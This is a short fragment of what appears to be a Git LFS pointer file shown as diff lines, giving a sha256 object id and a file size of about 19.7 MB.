+ oid sha256:d8b9db0e0de5edf32a81e5fd18a8ac35866d75b6528b647051947ed53c32fa57
3
+ size 19767758